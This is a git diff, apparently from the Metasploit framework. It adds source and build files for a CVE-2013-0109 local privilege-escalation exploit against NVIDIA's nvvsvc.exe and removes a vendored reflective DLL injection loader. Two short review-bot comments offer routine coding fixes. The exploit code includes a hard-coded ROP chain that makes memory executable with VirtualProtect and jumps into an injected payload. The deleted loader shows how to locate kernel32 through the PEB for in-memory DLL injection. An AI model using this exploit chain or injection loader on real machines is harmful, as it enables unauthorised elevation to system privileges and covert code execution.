+ // Param 3: flNewProtect [r8 = 0x40 (PAGE_EXECUTE_READWRITE)] + pRopChain[10] = uiBase + 0xd33a; // nvvsvc.exe+0xd33a: pop rax; retn + pRopChain[11] = 0x40; // PAGE_EXECUTE_READWRITE + pRopChain[12] = uiBase + 0x8d26; // nvvsvc.exe+0x8d26: mov r8d, eax; mov eax, r8d; add rsp, 28h; retn + pRopChain[13] = 0; // Padding ... + pRopChain[14] = 0; // ... + pRopChain[15] = 0; // ... + pRopChain[16] = 0; // ... + pRopChain[17] = 0; // ... + // Param 4: lpflOldProtect [r9 - already points at writable location] + pRopChain[18] = uiBase + 0xd33a; // nvvsvc.exe+0xd33a: pop rax; retn + pRopChain[19] = uiBase + 0x91310; // IAT entry &VirtualProtect - 0x128 + pRopChain[20] = uiBase + 0x82851; // nvvsvc.exe+0x82851: mov rax, [rax+128h]; add rsp, 28h; retn + pRopChain[21] = 0; // Padding ... + pRopChain[22] = 0; // ... + pRopChain[23] = 0; // ... + pRopChain[24] = 0; // ... + pRopChain[25] = 0; // ... + pRopChain[26] = uiBase + 0x44fb6; // nvvsvc.exe+0x44fb6: jmp rax + pRopChain[27] = uiBase + 0x8a0dc; // nvvsvc.exe+0x8a0dc: push rsp; retn + + memcpy(pRopChain + 28, payload, payloadLen); + break; + } + + break; + } + + i++; + } + +Cleanup: + if (hPipe) + { + CloseHandle(hPipe); + } +} \ No newline at end of file diff --git a/external/source/exploits/cve-2013-0109/nvidia_nvsvc/nvidia_nvsvc.h b/external/source/exploits/cve-2013-0109/nvidia_nvsvc/nvidia_nvsvc.h new file mode 100755 index 0000000000..697b58450b --- /dev/null +++ b/external/source/exploits/cve-2013-0109/nvidia_nvsvc/nvidia_nvsvc.h @@ -0,0 +1,6 @@ +#ifndef _METASPLOIT_SOURCE_NVIDIA_NVSVC_H +#define _METASPLOIT_SOURCE_NVIDIA_NVSVC_H + +VOID elevate_nvidia_nvsvc(LPVOID payload); + +#endif diff --git a/external/source/exploits/cve-2013-0109/nvidia_nvsvc/nvidia_nvsvc.vcxproj b/external/source/exploits/cve-2013-0109/nvidia_nvsvc/nvidia_nvsvc.vcxproj new file mode 100755 index 0000000000..41d2cbd3f2 --- /dev/null +++ b/external/source/exploits/cve-2013-0109/nvidia_nvsvc/nvidia_nvsvc.vcxproj 
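Review bot: The new header nvidia_nvsvc.h declares `VOID elevate_nvidia_nvsvc(LPVOID payload);` without including anything that defines `VOID` and `LPVOID`, so it compiles only when the including file has already pulled in the Windows headers. Adding `#include <windows.h>` above the prototype would make it self-contained. The prototype is also undocumented, although the definition in nvidia_nvsvc.c states that the payload must be NULL terminated and measures it with `strlen`; I would repeat that contract here, e.g. `/* payload: NUL-terminated buffer; length is taken with strlen() */`. The include guard `_METASPLOIT_SOURCE_NVIDIA_NVSVC_H` begins with an underscore followed by a capital letter, which C reserves for the implementation; `METASPLOIT_SOURCE_NVIDIA_NVSVC_H` avoids that.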
@@ -0,0 +1,142 @@ + + + + + Debug + Win32 + + + Release + Win32 + + + + {6B3FF768-1F25-49C1-8827-EDEC84D4749F} + nvidia_nvsvc + Win32Proj + + + + DynamicLibrary + MultiByte + false + v120 + + + DynamicLibrary + MultiByte + v120 + + + + + + + + + + + <_ProjectFileVersion>10.0.30319.1 + $(Configuration)\$(Platform)\ + $(Configuration)\$(Platform)\ + false + false + AllRules.ruleset + + + $(ProjectName).$(PlatformShortName) + + + + Disabled + ..\..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories) + WIN32;_DEBUG;_WINDOWS;_USRDLL;nvidia_nvsvcessorDefinitions) + true + EnableFastChecks + MultiThreadedDebug + + + Level3 + + + Mpr.lib;%(AdditionalDependencies) + %(AdditionalLibraryDirectories) + %(DelayLoadDLLs) + true + Windows + MachineX86 + + + /ignore:4070 + + + editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL + + + _DEBUG;_USING_V110_SDK71_;%(PreprocessorDefinitions) + + + + + MinSpace + OnlyExplicitInline + false + ..\..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories) + WIN32;NDEBUG;_WINDOWS;_USRDLL;nvidia_nvsvcessorDefinitions) + true + MultiThreaded + false + + + $(OutDir)\ + $(OutDir)\ + $(OutDir)\ + Level3 + ProgramDatabase + false + Size + + + Mpr.lib;%(AdditionalDependencies) + %(AdditionalLibraryDirectories) + false + %(IgnoreSpecificDefaultLibraries) + %(DelayLoadDLLs) + false + true + $(OutDir)\nvidia_nvsvc.map + Windows + + + + + false + + + $(OutDir)\nvidia_nvsvc.lib + MachineX86 + false + + + /ignore:4070 + + + editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL +IF EXIST "..\..\..\..\..\data\exploits\CVE-2013-0109\" GOTO COPY + mkdir "..\..\..\..\..\data\exploits\CVE-2013-0109\" +:COPY +copy /y "$(TargetDir)$(TargetFileName)" "..\..\..\..\..\data\exploits\CVE-2013-0109\" + + + + + + + + + + + + + + \ No newline at end of file 
diff --git a/external/source/exploits/cve-2013-0109/nvidia_nvsvc/nvidia_nvsvc.vcxproj.filters b/external/source/exploits/cve-2013-0109/nvidia_nvsvc/nvidia_nvsvc.vcxproj.filters new file mode 100755 index 0000000000..1874b42275 --- /dev/null +++ b/external/source/exploits/cve-2013-0109/nvidia_nvsvc/nvidia_nvsvc.vcxproj.filters @@ -0,0 +1,10 @@ + + + + + + + + + + \ No newline at end of file diff --git a/external/source/exploits/cve-2013-3660/.gitignore b/external/source/exploits/cve-2013-3660/.gitignore new file mode 100644 index 0000000000..c93d5cfc27 --- /dev/null +++ b/external/source/exploits/cve-2013-3660/.gitignore 
@@ -0,0 +1,152 @@
+## Ignore Visual Studio temporary files, build results, and
+## files generated by popular Visual Studio add-ons.
+
+# User-specific files
+*.suo
+*.user
+*.sln.docstates
+
+# Build results
+
+[Dd]ebug/
+[Rr]elease/
+x64/
+build/
+[Bb]in/
+[Oo]bj/
+
+# Enable "build/" folder in the NuGet Packages folder since NuGet packages use it for MSBuild targets
+!packages/*/build/
+
+# MSTest test Results
+[Tt]est[Rr]esult*/
+[Bb]uild[Ll]og.*
+
+*_i.c
+*_p.c
+*.ilk
+*.meta
+*.obj
+*.pch
+*.pdb
+*.pgc
+*.pgd
+*.rsp
+*.sbr
+*.tlb
+*.tli
+*.tlh
+*.tmp
+*.tmp_proj
+*.log
+*.vspscc
+*.vssscc
+.builds
+*.pidb
+*.log
+*.scc
+
+# Visual C++ cache files
+ipch/
+*.aps
+*.ncb
+*.opensdf
+*.sdf
+*.cachefile
+
+# Visual Studio profiler
+*.psess
+*.vsp
+*.vspx
+
+# Guidance Automation Toolkit
+*.gpState
+
+# ReSharper is a .NET coding add-in
+_ReSharper*/
+*.[Rr]e[Ss]harper
+
+# TeamCity is a build add-in
+_TeamCity*
+
+# DotCover is a Code Coverage Tool
+*.dotCover
+
+# NCrunch
+*.ncrunch*
+.*crunch*.local.xml
+
+# Installshield output folder
+[Ee]xpress/
+
+# DocProject is a documentation generator add-in
+DocProject/buildhelp/
+DocProject/Help/*.HxT
+DocProject/Help/*.HxC
+DocProject/Help/*.hhc
+DocProject/Help/*.hhk
+DocProject/Help/*.hhp
+DocProject/Help/Html2
+DocProject/Help/html
+
+# Click-Once directory
+publish/
+
+# Publish Web Output
+*.Publish.xml
+*.pubxml
+
+# NuGet Packages Directory
+## TODO: If you have NuGet Package Restore enabled, uncomment the next line
+#packages/
+
+# Windows Azure Build Output
+csx
+*.build.csdef
+
+# Windows Store app package directory
+AppPackages/
+
+# Others
+sql/
+*.Cache
+ClientBin/
+[Ss]tyle[Cc]op.*
+~$*
+*~
+*.dbmdl
+*.[Pp]ublish.xml
+*.pfx
+*.publishsettings
+
+# RIA/Silverlight projects
+Generated_Code/
+
+# Backup & report files from converting an old project file to a newer
+# Visual Studio version.
Backup files are not needed, because we have git ;-) +_UpgradeReport_Files/ +Backup*/ +UpgradeLog*.XML +UpgradeLog*.htm + +# SQL Server files +App_Data/*.mdf +App_Data/*.ldf + +# ========================= +# Windows detritus +# ========================= + +# Windows image file caches +Thumbs.db +ehthumbs.db + +# Folder config file +Desktop.ini + +# Recycle Bin used on file shares +$RECYCLE.BIN/ + +# Mac crap +.DS_Store + diff --git a/external/source/exploits/make.bat b/external/source/exploits/make.bat index 808969ad80..6981f1f155 100755 --- a/external/source/exploits/make.bat +++ b/external/source/exploits/make.bat @@ -26,6 +26,13 @@ PUSHD CVE-2010-0232 msbuild.exe make.msbuild /target:%PLAT% POPD +IF "%ERRORLEVEL%"=="0" ( + ECHO "Building CVE-2013-0109 (nvidia_nvsvc)" + PUSHD CVE-2013-0109 + msbuild.exe make.msbuild /target:%PLAT% + POPD +) + IF "%ERRORLEVEL%"=="0" ( ECHO "Building CVE-2013-3660 (ppr_flatten_rec)" PUSHD CVE-2013-3660 diff --git a/external/source/vncdll/.gitignore b/external/source/vncdll/.gitignore new file mode 100644 index 0000000000..c93d5cfc27 --- /dev/null +++ b/external/source/vncdll/.gitignore 
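Review bot: In the added CVE-2013-0109 block of make.bat the result of `PUSHD CVE-2013-0109` is never checked, so if that directory is missing, msbuild.exe runs in the current directory and the following `POPD` pops a directory this block did not push. Checking it in place, e.g. `PUSHD CVE-2013-0109 || EXIT /B 1` (or a jump to whatever error handling the script has outside this hunk), would make the build stop at the real failure. The block also depends on `POPD` leaving the `%ERRORLEVEL%` set by msbuild intact for the next `IF "%ERRORLEVEL%"=="0"` test; a short comment such as `REM ERRORLEVEL from msbuild is tested by the next block` would record that. The existing CVE-2013-3660 block follows the same pattern, and its end lies outside this hunk.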
@@ -0,0 +1,152 @@
+## Ignore Visual Studio temporary files, build results, and
+## files generated by popular Visual Studio add-ons.
+
+# User-specific files
+*.suo
+*.user
+*.sln.docstates
+
+# Build results
+
+[Dd]ebug/
+[Rr]elease/
+x64/
+build/
+[Bb]in/
+[Oo]bj/
+
+# Enable "build/" folder in the NuGet Packages folder since NuGet packages use it for MSBuild targets
+!packages/*/build/
+
+# MSTest test Results
+[Tt]est[Rr]esult*/
+[Bb]uild[Ll]og.*
+
+*_i.c
+*_p.c
+*.ilk
+*.meta
+*.obj
+*.pch
+*.pdb
+*.pgc
+*.pgd
+*.rsp
+*.sbr
+*.tlb
+*.tli
+*.tlh
+*.tmp
+*.tmp_proj
+*.log
+*.vspscc
+*.vssscc
+.builds
+*.pidb
+*.log
+*.scc
+
+# Visual C++ cache files
+ipch/
+*.aps
+*.ncb
+*.opensdf
+*.sdf
+*.cachefile
+
+# Visual Studio profiler
+*.psess
+*.vsp
+*.vspx
+
+# Guidance Automation Toolkit
+*.gpState
+
+# ReSharper is a .NET coding add-in
+_ReSharper*/
+*.[Rr]e[Ss]harper
+
+# TeamCity is a build add-in
+_TeamCity*
+
+# DotCover is a Code Coverage Tool
+*.dotCover
+
+# NCrunch
+*.ncrunch*
+.*crunch*.local.xml
+
+# Installshield output folder
+[Ee]xpress/
+
+# DocProject is a documentation generator add-in
+DocProject/buildhelp/
+DocProject/Help/*.HxT
+DocProject/Help/*.HxC
+DocProject/Help/*.hhc
+DocProject/Help/*.hhk
+DocProject/Help/*.hhp
+DocProject/Help/Html2
+DocProject/Help/html
+
+# Click-Once directory
+publish/
+
+# Publish Web Output
+*.Publish.xml
+*.pubxml
+
+# NuGet Packages Directory
+## TODO: If you have NuGet Package Restore enabled, uncomment the next line
+#packages/
+
+# Windows Azure Build Output
+csx
+*.build.csdef
+
+# Windows Store app package directory
+AppPackages/
+
+# Others
+sql/
+*.Cache
+ClientBin/
+[Ss]tyle[Cc]op.*
+~$*
+*~
+*.dbmdl
+*.[Pp]ublish.xml
+*.pfx
+*.publishsettings
+
+# RIA/Silverlight projects
+Generated_Code/
+
+# Backup & report files from converting an old project file to a newer
+# Visual Studio version.
Backup files are not needed, because we have git ;-) +_UpgradeReport_Files/ +Backup*/ +UpgradeLog*.XML +UpgradeLog*.htm + +# SQL Server files +App_Data/*.mdf +App_Data/*.ldf + +# ========================= +# Windows detritus +# ========================= + +# Windows image file caches +Thumbs.db +ehthumbs.db + +# Folder config file +Desktop.ini + +# Recycle Bin used on file shares +$RECYCLE.BIN/ + +# Mac crap +.DS_Store + diff --git a/external/source/vncdll/loader/LoadLibraryR.c b/external/source/vncdll/loader/LoadLibraryR.c deleted file mode 100644 index 8960cfe16f..0000000000 --- a/external/source/vncdll/loader/LoadLibraryR.c +++ /dev/null 
@@ -1,131 +0,0 @@
-//===============================================================================================//
-// Copyright (c) 2009, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
-// All rights reserved.
-//
-// Redistribution and use in source and binary forms, with or without modification, are permitted
-// provided that the following conditions are met:
-//
-// * Redistributions of source code must retain the above copyright notice, this list of
-// conditions and the following disclaimer.
-//
-// * Redistributions in binary form must reproduce the above copyright notice, this list of
-// conditions and the following disclaimer in the documentation and/or other materials provided
-// with the distribution.
-//
-// * Neither the name of Harmony Security nor the names of its contributors may be used to
-// endorse or promote products derived from this software without specific prior written permission.
-//
-// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
-// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
-// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
-// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
-// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
-// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
-// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
-// POSSIBILITY OF SUCH DAMAGE.
-//===============================================================================================// -#include "LoadLibraryR.h" -//===============================================================================================// -DWORD Rva2Offset( DWORD dwRva, UINT_PTR uiBaseAddress ) -{ - WORD wIndex = 0; - PIMAGE_SECTION_HEADER pSectionHeader = NULL; - PIMAGE_NT_HEADERS pNtHeaders = NULL; - - pNtHeaders = (PIMAGE_NT_HEADERS)(uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew); - - pSectionHeader = (PIMAGE_SECTION_HEADER)((UINT_PTR)(&pNtHeaders->OptionalHeader) + pNtHeaders->FileHeader.SizeOfOptionalHeader); - - if( dwRva < pSectionHeader[0].PointerToRawData ) - return dwRva; - - for( wIndex=0 ; wIndex < pNtHeaders->FileHeader.NumberOfSections ; wIndex++ ) - { - if( dwRva >= pSectionHeader[wIndex].VirtualAddress && dwRva < (pSectionHeader[wIndex].VirtualAddress + pSectionHeader[wIndex].SizeOfRawData) ) - return ( dwRva - pSectionHeader[wIndex].VirtualAddress + pSectionHeader[wIndex].PointerToRawData ); - } - - return 0; -} -//===============================================================================================// -DWORD GetReflectiveLoaderOffset( VOID * lpReflectiveDllBuffer ) -{ - UINT_PTR uiBaseAddress = 0; - UINT_PTR uiExportDir = 0; - UINT_PTR uiNameArray = 0; - UINT_PTR uiAddressArray = 0; - UINT_PTR uiNameOrdinals = 0; - DWORD dwCounter = 0; -#ifdef _WIN64 - DWORD dwMeterpreterArch = 2; -#else - DWORD dwMeterpreterArch = 1; -#endif - - uiBaseAddress = (UINT_PTR)lpReflectiveDllBuffer; - - // get the File Offset of the modules NT Header - uiExportDir = uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew; - - // currenlty we can only process a PE file which is the same type as the one this fuction has - // been compiled as, due to various offset in the PE structures being defined at compile time. 
- if( ((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.Magic == 0x010B ) // PE32 - { - if( dwMeterpreterArch != 1 ) - return 0; - } - else if( ((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.Magic == 0x020B ) // PE64 - { - if( dwMeterpreterArch != 2 ) - return 0; - } - else - { - return 0; - } - - // uiNameArray = the address of the modules export directory entry - uiNameArray = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ]; - - // get the File Offset of the export directory - uiExportDir = uiBaseAddress + Rva2Offset( ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress, uiBaseAddress ); - - // get the File Offset for the array of name pointers - uiNameArray = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNames, uiBaseAddress ); - - // get the File Offset for the array of addresses - uiAddressArray = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions, uiBaseAddress ); - - // get the File Offset for the array of name ordinals - uiNameOrdinals = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNameOrdinals, uiBaseAddress ); - - // get a counter for the number of exported functions... 
- dwCounter = ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->NumberOfNames; - - // loop through all the exported functions to find the ReflectiveLoader - while( dwCounter-- ) - { - char * cpExportedFunctionName = (char *)(uiBaseAddress + Rva2Offset( DEREF_32( uiNameArray ), uiBaseAddress )); - - if( strstr( cpExportedFunctionName, "ReflectiveLoader" ) != NULL ) - { - // get the File Offset for the array of addresses - uiAddressArray = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions, uiBaseAddress ); - - // use the functions name ordinal as an index into the array of name pointers - uiAddressArray += ( DEREF_16( uiNameOrdinals ) * sizeof(DWORD) ); - - // return the File Offset to the ReflectiveLoader() functions code... - return Rva2Offset( DEREF_32( uiAddressArray ), uiBaseAddress ); - } - // get the next exported function name - uiNameArray += sizeof(DWORD); - - // get the next exported function name ordinal - uiNameOrdinals += sizeof(WORD); - } - - return 0; -} -//===============================================================================================// diff --git a/external/source/vncdll/loader/LoadLibraryR.h b/external/source/vncdll/loader/LoadLibraryR.h deleted file mode 100644 index 5c1e65075f..0000000000 --- a/external/source/vncdll/loader/LoadLibraryR.h +++ /dev/null 
@@ -1,37 +0,0 @@
-//===============================================================================================//
-// Copyright (c) 2009, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
-// All rights reserved.
-//
-// Redistribution and use in source and binary forms, with or without modification, are permitted
-// provided that the following conditions are met:
-//
-// * Redistributions of source code must retain the above copyright notice, this list of
-// conditions and the following disclaimer.
-//
-// * Redistributions in binary form must reproduce the above copyright notice, this list of
-// conditions and the following disclaimer in the documentation and/or other materials provided
-// with the distribution.
-//
-// * Neither the name of Harmony Security nor the names of its contributors may be used to
-// endorse or promote products derived from this software without specific prior written permission.
-//
-// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
-// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
-// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
-// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
-// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
-// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
-// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
-// POSSIBILITY OF SUCH DAMAGE.
-//===============================================================================================// -#ifndef _VNCDLL_LOADER_LOADLIBRARYR_H -#define _VNCDLL_LOADER_LOADLIBRARYR_H -//===============================================================================================// -#include "ReflectiveDLLInjection.h" - -DWORD GetReflectiveLoaderOffset( VOID * lpReflectiveDllBuffer ); - -//===============================================================================================// -#endif -//===============================================================================================// diff --git a/external/source/vncdll/loader/ReflectiveDLLInjection.h b/external/source/vncdll/loader/ReflectiveDLLInjection.h deleted file mode 100644 index d41b2ac323..0000000000 --- a/external/source/vncdll/loader/ReflectiveDLLInjection.h +++ /dev/null 
@@ -1,53 +0,0 @@
-//===============================================================================================//
-// Copyright (c) 2009, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
-// All rights reserved.
-//
-// Redistribution and use in source and binary forms, with or without modification, are permitted
-// provided that the following conditions are met:
-//
-// * Redistributions of source code must retain the above copyright notice, this list of
-// conditions and the following disclaimer.
-//
-// * Redistributions in binary form must reproduce the above copyright notice, this list of
-// conditions and the following disclaimer in the documentation and/or other materials provided
-// with the distribution.
-//
-// * Neither the name of Harmony Security nor the names of its contributors may be used to
-// endorse or promote products derived from this software without specific prior written permission.
-//
-// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
-// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
-// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
-// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
-// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
-// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
-// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
-// POSSIBILITY OF SUCH DAMAGE.
-//===============================================================================================// -#ifndef _VNCDLL_LOADER_REFLECTIVEDLLINJECTION_H -#define _VNCDLL_LOADER_REFLECTIVEDLLINJECTION_H -//===============================================================================================// -#define WIN32_LEAN_AND_MEAN -#include - -// we declare some common stuff in here... - -#define DLL_METASPLOIT_ATTACH 4 -#define DLL_METASPLOIT_DETACH 5 -#define DLL_QUERY_HMODULE 6 - -#define DEREF( name )*(UINT_PTR *)(name) -#define DEREF_64( name )*(DWORD64 *)(name) -#define DEREF_32( name )*(DWORD *)(name) -#define DEREF_16( name )*(WORD *)(name) -#define DEREF_8( name )*(BYTE *)(name) - -typedef DWORD (WINAPI * REFLECTIVELOADER)( VOID ); -typedef BOOL (WINAPI * DLLMAIN)( HINSTANCE, DWORD, LPVOID ); - -#define DLLEXPORT __declspec( dllexport ) - -//===============================================================================================// -#endif -//===============================================================================================// diff --git a/external/source/vncdll/loader/ReflectiveLoader.c b/external/source/vncdll/loader/ReflectiveLoader.c deleted file mode 100644 index fe667a830d..0000000000 --- a/external/source/vncdll/loader/ReflectiveLoader.c +++ /dev/null 
@@ -1,451 +0,0 @@ -//===============================================================================================// -// Copyright (c) 2009, Stephen Fewer of Harmony Security (www.harmonysecurity.com) -// All rights reserved. -// -// Redistribution and use in source and binary forms, with or without modification, are permitted -// provided that the following conditions are met: -// -// * Redistributions of source code must retain the above copyright notice, this list of -// conditions and the following disclaimer. -// -// * Redistributions in binary form must reproduce the above copyright notice, this list of -// conditions and the following disclaimer in the documentation and/or other materials provided -// with the distribution. -// -// * Neither the name of Harmony Security nor the names of its contributors may be used to -// endorse or promote products derived from this software without specific prior written permission. -// -// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR -// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND -// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR -// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR -// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR -// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY -// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR -// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE -// POSSIBILITY OF SUCH DAMAGE. 
-//===============================================================================================// -#include "ReflectiveLoader.h" -//===============================================================================================// -// Our loader will set this to a pseudo correct HINSTANCE/HMODULE value -HINSTANCE hAppInstance = NULL; -//===============================================================================================// -#ifdef _WIN64 -#pragma intrinsic( _ReturnAddress ) -UINT_PTR eip( VOID ) { return (UINT_PTR)_ReturnAddress(); } -#endif -//===============================================================================================// - -// Note 1: If you want to have your own DllMain, define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN, -// otherwise the DllMain at the end of this file will be used. - -// Note 2: If you are injecting the DLL via LoadRemoteLibraryR, define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR, -// otherwise it is assumed you are calling the ReflectiveLoader via a stub. 
- -// This is our position independent reflective DLL loader/injector -#ifdef REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR -DLLEXPORT UINT_PTR WINAPI ReflectiveLoader( LPVOID lpParameter ) -#else -DLLEXPORT UINT_PTR WINAPI ReflectiveLoader( VOID ) -#endif -{ - // the functions we need - LOADLIBRARYA pLoadLibraryA; - GETPROCADDRESS pGetProcAddress; - VIRTUALALLOC pVirtualAlloc; - USHORT usCounter; - - // the initial location of this image in memory - UINT_PTR uiLibraryAddress; - // the kernels base address and later this images newly loaded base address - UINT_PTR uiBaseAddress; - - // variables for processing the kernels export table - UINT_PTR uiAddressArray; - UINT_PTR uiNameArray; - UINT_PTR uiExportDir; - UINT_PTR uiNameOrdinals; - DWORD dwHashValue; - - // variables for loading this image - UINT_PTR uiHeaderValue; - UINT_PTR uiValueA; - UINT_PTR uiValueB; - UINT_PTR uiValueC; - UINT_PTR uiValueD; - - // STEP 0: calculate our images current base address - - // we will start searching backwards from our current EIP -#ifdef _WIN64 - uiLibraryAddress = eip(); -#else - __asm call geteip - __asm geteip: pop uiLibraryAddress -#endif - - // loop through memory backwards searching for our images base address - // we dont need SEH style search as we shouldnt generate any access violations with this - while( TRUE ) - { - if( ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_magic == IMAGE_DOS_SIGNATURE ) - { - uiHeaderValue = ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew; - // some x64 dll's can trigger a bogus signature (IMAGE_DOS_SIGNATURE == 'POP r10'), - // we sanity check the e_lfanew with an upper threshold value of 1024 to avoid problems. 
- if( uiHeaderValue >= sizeof(IMAGE_DOS_HEADER) && uiHeaderValue < 1024 ) - { - uiHeaderValue += uiLibraryAddress; - // break if we have found a valid MZ/PE header - if( ((PIMAGE_NT_HEADERS)uiHeaderValue)->Signature == IMAGE_NT_SIGNATURE ) - break; - } - } - uiLibraryAddress--; - } - - // STEP 1: process the kernels exports for the functions our loader needs... - - // get the Process Enviroment Block -#ifdef _WIN64 - uiBaseAddress = __readgsqword( 0x60 ); -#else - uiBaseAddress = __readfsdword( 0x30 ); -#endif - - // get the processes loaded modules. ref: http://msdn.microsoft.com/en-us/library/aa813708(VS.85).aspx - uiBaseAddress = (UINT_PTR)((_PPEB)uiBaseAddress)->pLdr; - - // get the first entry of the InMemoryOrder module list - uiValueA = (UINT_PTR)((PPEB_LDR_DATA)uiBaseAddress)->InMemoryOrderModuleList.Flink; - while( uiValueA ) - { - // get pointer to current modules name (unicode string) - uiValueB = (UINT_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->BaseDllName.pBuffer; - // set bCounter to the length for the loop - usCounter = ((PLDR_DATA_TABLE_ENTRY)uiValueA)->BaseDllName.Length; - // clear uiValueC which will store the hash of the module name - uiValueC = 0; - // compute the hash of the module name... 
- do - { - uiValueC = ror( (DWORD)uiValueC ); - // normalize to uppercase if the madule name is in lowercase - if( *((BYTE *)uiValueB) >= 'a' ) - uiValueC += *((BYTE *)uiValueB) - 0x20; - else - uiValueC += *((BYTE *)uiValueB); - uiValueB++; - } while( --usCounter ); - // compare the hash with that of kernel32.dll - if( (DWORD)uiValueC == KERNEL32DLL_HASH ) - { - // get this modules base address - uiBaseAddress = (UINT_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->DllBase; - break; - } - // get the next entry - uiValueA = DEREF( uiValueA ); - } - - // get the VA of the modules NT Header - uiExportDir = uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew; - - // uiNameArray = the address of the modules export directory entry - uiNameArray = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ]; - - // get the VA of the export directory - uiExportDir = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress ); - - // get 